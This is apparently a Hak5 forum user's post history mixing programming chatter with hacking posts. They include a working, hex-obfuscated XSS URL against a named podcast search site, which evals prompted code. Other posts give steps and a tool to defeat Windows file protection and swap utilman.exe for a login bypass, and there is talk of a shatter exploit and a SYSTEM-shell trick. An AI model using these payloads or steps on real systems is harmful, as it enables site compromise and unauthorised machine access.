Mick
-
Posts
40 -
Joined
-
Last visited
Posts posted by Mick
-
-
Do you mean like a check if the command executed properly?
Such as:
net localgroup administrators /add %uname% if %ERRORLEVEL% neq 0 goto failed echo The Command Was Successful! goto done :failed echo Tho Command Failed. :done exit
-
Nice Program.
The simple interface is really easy on the eyes.
Although,
Is it possible to release the source code.
I would like to make some minor changes.
(Such as not having a hardcoded path to rcrack)
(And maybe porting it to linux!)
-
Well, if you want to get advanced, you could always do
echo y|del something
or even store your prerecorded answers in a file and call
del something < answers.txt
-
Wow. Windows Server 2003's cmd.exe does nothing, it doesn't give me a DEP message, no "AAAAAAAAAA..." cannot be found as would be expected. Nothing.
But in command.com on the same machine, when I pasted it, it started making this long sequence of beeps from the motherboard, then when the beeping stopped, i just closed the window and didn't want to even try running it, but I then got a Stop Error (BSOD) and had to ruin my uptime. (I know, dont test exploits on your webserver)
-
Well, first of all, my C code is more of an example then an implementation.
There are many faster ways to find primes.
And on a technicallity he said any possible number, he didnt specify possible as in with any number, or possible as in using the language's built in functions :), but im not that much of a cheater.
My next example will be in C++ and I just might have to whip out my infinite number class.
-
Mines in pure C.
This will be simple so people can get a good look, but beware I am away from my compiler atm so there may be errors.
//Prime Number Program By Mick #include <stdio.h> #include <math.h> int isprime(int num){int i; for (i=num-1;i>1;i--){if (num==floor(num/i)*i) {return false;}} return true;} int main(){ int n1,n2,n3; printf("Enter Number 1 ");scanf("%d",n1); printf("Enter Number 2 ");scanf("%d",n2); if (n1<0){n1=0;}if (n2<0){n2=0;} if (n1>n2){n3=n2;n2=n1;n1=n3;} for(n3=n1;n3<n2;n3++){if (isprime(n3)) {printf("%dn",n3);}} return 0; }EDIT: Ported to javascript :)
(TESTED) EDIT: Optimised A Little :)
//Prime Number Script By Mick function isprime(num){ if (!(num%2)){return false;} if (!(num%5)){return false;} if (!(num%9)){return false;} var sn=Math.sqrt(num); for (i=(num-1)/2;i>sn;i--){if (num==Math.floor(num/i)*i) {return false;}} return true;} var n1,n2,n3; n1=prompt("Enter Number 1",""); n2=prompt("Enter Number 2",""); if (n1<0){n1=0;}if (n2<0){n2=0;} if (n1>n2){n3=n2;n2=n1;n1=n3;} for(n3=n1;n3<n2;n3++){if (isprime(n3)) {document.write("<div />"+n3);}}Still more to come!
-
Wow i programed a white hat... =O lol. yay i gain a point. VB6 ftw!! (me and a few mates are competing against each other "i can do anythink u can do better - VB6 Vs. C++"
Heres a challenge, make it run on Linux, MacOS, Mac OS X, FreeBSD, Minix, iPods, Xbox GC PS2, or anything else that doesn't have windows on it. :twisted:
(ReactOS doesn't count beacuse it is binary compatible with windows)
(btw, im a VB hater, i've lost too many beginning programmers to the noob oriented virus/script kiddie language.)
-
Hey Boris! was this you?
:P(Now awaiting some type of software exploit from boris
) -
I've found an XSS vuneribility in the podzinger search engine.
It also works on the hak5 search page and any other podzinger search.
(All it does is pop up and prompt you for some javascript code, then
executes it, but it could be changed to anything)
http://hak5.podzinger.com/results.jsp?col=en-all-pod-ep&s=PZSID_
videopods_videopod0_3_7_0003&s=PZSID_pods_pod3_3_1_0007
&sname=Hak.5&q=Dummy+String://http://hak5.podzinger.com/results.j...;q=Dummy+String://http://hak5.podzinger.com/results.j...;q=Dummy+String://http://hak5.podzinger.com/results.j...;q=Dummy+String://http://hak5.podzinger.com/results.j...;q=Dummy+String://http://hak5.podzinger.com/results.j...;q=Dummy+String://http://hak5.podzinger.com/results.j...;q=Dummy+String://http://hak5.podzinger.com/results.j...;q=Dummy+String
The actual URL is
http://hak5.podzinger.com/results.jsp?col=en-all-pod-ep&s=PZSID_vi deopods_videopod0_3_7_0003&s=PZSID_pods_pod3_3_1_0007&sname=Hak .5&q=Dummy+String++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++%3Cscript%3Evar+codehex%3D%22 +76+61+72+20+64+73+3D+64+6F+63+75+6D+65+6E+74+2E+67+65+74+ 45+6C+65+6D+65+6E+74+42+79+49+64+28+22+74+6F+70+51+75+65+ 72+79+22+29+3B+64+73+2E+76+61+6C+75+65+3D+22+44+75+6D+6D+ 79+20+53+74+72+69+6E+67+22+3B+64+6F+63+75+6D+65+6E+74+2E+ 74+69+74+6C+65+3D+22+50+4F+44+5A+49+4E+47+45+52+3A+20+44+ 75+6D+6D+79+20+53+74+72+69+6E+67+22+3B%22%2B%22+65+76+61 +6C+28+70+72+6F+6D+70+74+28+22+43+6F+64+65+20+54+6F+20+45 +78+65+63+75+74+65+22+2C+22+61+6C+65+72+74+28+27+48+65+6C +6C+6F+2C+20+57+6F+72+6C+64+21+27+29+3B+22+29+29+3B%22%3B if+%28xssae+%21%3D+%22dun%22%29%7Beval%28unescape%28codehe x.split%28%22+%22%29.join%28%22%25%22%29%29%29%3Bvar+xssae %3D%22dun%22%3B%7D%3C%2Fscript%3E
And it decodes and executes this code:
var ds=document.getElementById("topQuery"); ds.value="Dummy String"; document.title="PODZINGER: Dummy String"; eval(prompt("Code To Execute","alert('Hello, World!');")); -
Im working on being able to run as a guest or limited user, I have a shatter exploit written, but so far it just crashes the target on the call to LoadLibrary
-
Of those two, I would say python.
Then I would say to move on to something a little more advanced later.
I would say that C++ (or java...) wouldn't be too hard coming from python.
Then when you feel like a master computer programmer make yourself feel like a little newbie looking at Hello World in assembely.
Learning ASM kinda gives you a universal keygen.
-
Maybe i should be more clear.
Use it to unprotect "C:windowssystem32utilman.exe"
Then on that one unlock, you have to replace both:
"C:windowssystem32utilman.exe" AND
"C:windowssystem32dllcacheutilman.exe"
And get at least two feet off the ground before the tempature sensors turn back on, then you will have a 12 second window to climb up the wire you are hanging by before the lazers activate, your infrafed glases will allow you to see them so you can avoid them as you crawl out of the ventelation ducts onto the 82nd floor, where you will exit through the window and knock out the window washer, then ride the cart down to the 30th story, where you will short the UP button and let it just go straight up and will eventually hit the top and set off the roof alarm, this will distract the guards at the front, using your magnetic suit, slide down the side and enter the taxicab 1 car up from the corner on the left and ride back to your desktop.
</ far-fetched story written out of boredom>
-
I keep my list nice and short.
- DOM Inspector - (Preloaded)
IE Tab
DownThemAll!
Greasemonkey
Tamper Data
VideoDownloader
FlashGot
Tab Mix Plus
FireFTP
InspectThis
View Dependinces
X-Ray
Save As Image
View Source Chart
ErrorZilla Mod
OperaView
Sothink SWF Catcher
-
Did you also replace the file in the dllcache.
Replace both C:windowssystem32mysysapp.exe
And C:windowssystem32dllcachemysysapp.exe
In your time window.
-
Well, if you wanted to incorporate it into maybe a switchblade utilman replacer then go to line 63 in the file SFCDisableDlg.cpp
The unlocking code is there. Everything else is just wxWindows bullshit.
-
I would say to drop Visual Basic like the bad habit it is.
It really gets you into a VB only mindset, and makes it harder to switch to a portable (or non MS) language.
-
You could go to the store and buy an apple wall charger too. :-)
-
Hey, in response to the UtilMan.exe hack thingy.
I made a little proggie that unlocks any system file.
The best part about it is that it uses undocumented, unnamed, unauthorized microsoft API.
Here is the precompiled program and the source code.
http://zxcvbnm.zapto.org/apps/SFCD
Ive been able to replace utilman.exe (and any other system file i tried)
without rebooting.
EDIT: Instructions:
1. Resign the file you want to replace. (I would suggest using LordPE)
2. Unlock the file with my program. (C:WindowsSystem32notepad.exe)
3. Replace the actual file. (C:WindowsSystem32notepad.exe)
4. Replace the dllcache file. (C:WindowsSystem32dllcachenotepad.exe)
5. Let the time expire on the program.
-
Just compile this in retail mode.
int main(){*((char*)0x0)='n';}If you dont know it tries to write to memory address 0x000000. (Windows doesn't like that too much.)
So, theres my contribution to the Dr.Watson thing.
-
Usually The Cell Phone.
-
I would say go for UltraVNC and enable the java viewer.
I did that so i could do remote administration on my webserver easily without downloading anything on the client computer.
If you aren't already you may also need to get intimate with DMZ.
(and DynDNS (or No-IP)) if your IP changes or you just cant remember the numbers.
-
Has anyone tried making an app to launch explorer.exe.
(and maybe kill winlogon.exe if necessary).
It would double as a secutiry exploit and an activation hack :twisted:.
Also, wouldn't this give you a SYSTEM level account instead of an Admin.
-
I was in that confrence!!!
Its all true.
-
Yeah Darren!!
trying to trick us!!!
:P
)
Hak5 Community Rainbow Tables: NTLM vs. MD5 Final Vote
in Everything Else
Posted
NTLM, i dont know much about it.
I am going to research it.
For me, not knowing much about it means I haven't inplemened it in ASM using only core BIOS interrupts (so I can make it a bootable floppy).